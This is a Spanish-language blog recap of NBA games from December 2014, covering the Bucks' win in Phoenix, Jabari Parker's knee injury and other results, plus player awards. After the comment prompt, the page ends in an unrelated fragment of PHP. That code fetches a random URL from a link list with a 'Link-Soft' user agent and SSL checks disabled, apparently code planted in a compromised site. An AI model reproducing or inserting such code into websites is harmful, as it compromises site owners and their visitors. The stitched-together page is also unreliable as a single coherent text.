La crónica: Dolorosa victoria

16 de December de 2014 por MagicJohnson32

La angustiosa victoria de los Bucks en Phoenix no esconde el dolor por la lesión de Jabari Parker. El preciado rookie de los Bucks se tuvo que retirar después de dañarse la rodilla y todo apunta a un prolongado período de baja. Fue la nota más negativa de una madrugada en la que la salsa estuvo en el Este: jugaron 5 de los 6 primeros y todos menos uno resolvieron sus compromisos con victoria.

Os lo contamos a continuación.

jabari

Milwaukee Bucks 96 – Phoenix Suns 94

Apenas comenzaba la segunda mitad del Bucks-Suns cuando Jabari Parker atacaba el aro ante PJ Tucker. Tras perder por un momento el control de la pelota, la rodilla izquierda de Parker giró de manera extraña. El novato, claro candidato al RoY, cayó y rápidamente se llevó las manos a la zona dolorida, consciente de que se había lesionado. Esguince de rodilla, apunta el primer diagnóstico. Pronto sabremos más pero vamos preparándonos para estar sin Parker durante un tiempo, una baja que se suma a las muchas que ya acumula esta clase 2014 de rookies. El partido entre Bucks y Suns siguió, por supuesto, y se decidió con un afortunadísimo lanzamiento de Khris Middleton desde más allá de la línea de 3 que golpeó tablero y aro en varias ocasiones antes de entrar. Tal vez los dioses del baloncesto quisieron recompensar de esta manera a Milwaukee por el mazazo recibido. Antes del triple de Middleton asistimos a un espectacular intercambio de canastas, con Isaiah y Markieff Morris como protagonistas por parte local y Jason Kidd tirando de su banquillo para remontar un partido que siempre pintó cuesta arriba. Para los Suns, que de nuevo se vieron sin Goran Dragic, supone la sexta derrota seguida y la caída fuera de posiciones de Playoffs, mientras que los Bucks abren un trecho de cuatro partidos sobre el noveno del Este.

Charlotte Hornets 88 – Cleveland Cavaliers 97

Pese al parcial de 21-0 favorable a los Cavs con el que empezó el partido, los Hornets exigieron más de lo previsto al equipo de David Blatt. El demoledor arranque del equipo local parecía sentenciar el choque cuando apenas se llevaban unos minutos disputados. LeBron y Love se empleaban con sus versiones más dominantes y hasta mostraron una conexión que se acerca mucho a lo que sueñan en Ohio para este equipo armado con un único objetivo. Pero los Hornets, decepcionantes todo el curso, no bajaron los brazos y, cuando las rotaciones de ambos equipos entraron en juego, iniciaron una remontada que les llegó a situar a 2 puntos en el inicio del tercer cuarto. Hasta ahí llegó la heróica de los muchachos de Jordan, porque Love y James no estaban para bromas y no iban a dejar escapar la que supone la sexta vitoria seguida de los Cavs en el Q.

Chicago Bulls 86 – Atlanta Hawks 93

El duelo entre dos de los cocos del Este, que bien podrían verse las caras en una primera ronda de los próximos Playoffs, sirvió a los Hawks para reivindicarse con un triunfo de prestigio después de una racha de victorias ante equipos con balance perdedor cortada con una derrota en el último instante frente a los Magic. Anoche, contra unos Bulls que venían de ganar tres seguidos y amenazaban con alcanzar a Atlanta en los standings, Al Horford dio un paso al frente en su regreso al rendimiento pre lesión y se puso el equipo a la espalda. Sus 21 puntos, 10 rebotes, 6 asistencias y 2 robos fueron capitales en el devenir del encuentro, como también lo fue el día gris de Rose.

Resto de la jornada

Al frente del Este siguen los Raptors, que de regreso a Toronto tras necesitar una prórroga 24 horas antes en el Madison, superaron a los Magic (82-95) gracias a una excelente segunda mitad y al liderazgo de, una vez más, Kyle Lowry. Mucho más pareció pesarles el back to back a los Lakers, que antes de finalizar el primer cuarto de su partido en pista de los Pacers ya se encontraban 31 puntos abajo y llegaron a estar 21-60 en el segundo cuarto antes de maquillar levemente el marcador final (91-110). Fue el final de dos rachas, la de ocho derrotas de los Pacers y la de tres victorias de los Lakers. También era la segunda noche de un back to back para los Spurs, y ya sabemos cómo acostumbra Popovich a lidiar con ello. Sin Duncan, Manu, Parker y Splitter, los campeones cayeron en el Moda Center de Portland (95-108), donde siempre fueron por detrás y se vieron dominados por Aldridge & Lillard. Robin Lopez se fracturó la mano. Menos historia han tenido las cómodas victorias de Clippers contra Pistons (91-113) con el Drummond vs DeAndre como gran aliciente, y de los Celtics en Philadelphia (105-87), que Olynyk aprovechó para firmar unos números dignos de Anthony Davis.

PREMIOS

MVP: LeBron & Love dieron una muestra de lo que su sociedad puede llegar a ser al sumar 49 puntos, 25 rebotes, 18 asistencias, 5 robos y 3 tapones. Animalitos…

Rookie: Muy productivo Kyle Anderson con 15 puntos (6/7 tiros) y 5 rebotes en los 20 minutos de que dispuso en ausencia de Tim Duncan & Co. Pero el premio es para Noel, que dio muestras de su potencial con 19 puntos, 8 rebotes, 4 asistencias, 3 robos y 2 tapones.

Sorpresa:Kelly Olynyk le sobra el talento, eso es innegable, aunque su capacidad para demotrarlo va por días. Ayer fue uno de esos días: 30 puntos (12/17 FG), 9 rebotes, 3 robos y 2 tapones, números espectaculares aunque fuesen frente a los Sixers.

Decepción: La primera mitad que firmaron los Lakers en Indiana fue uno de los espectáculos más bochornosos que se puede ver este año en la NBA. El marcador a la conclusión de los esos 24 minutos de juego: 27-60. Los angelinos fallaron 17 de sus 20 primeros tiros. Mención especial para el 0/6 de Lin apenas un par de semanas después de su 0/10 contra los Wizards. Y, en Phoenix, ojo al 2 de 15 en triples de Gerald Green.

Mayor esfuerzo en vano: Presentan su candidatura al premio los 15 puntos, 17 rebotes y 2 tapones de Taj Gibson, el 18-13-2 de Drummond o los 21-9-4 de Kawhi Leonard, pero optamos por los 25 puntos, 7 rebotes y 3 asistencias de Markieff Morris, quien además puso a los Suns dos veces por delante en los últimos 30 segundos antes de asistir al triple ganador de Middleton.

Top 10

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>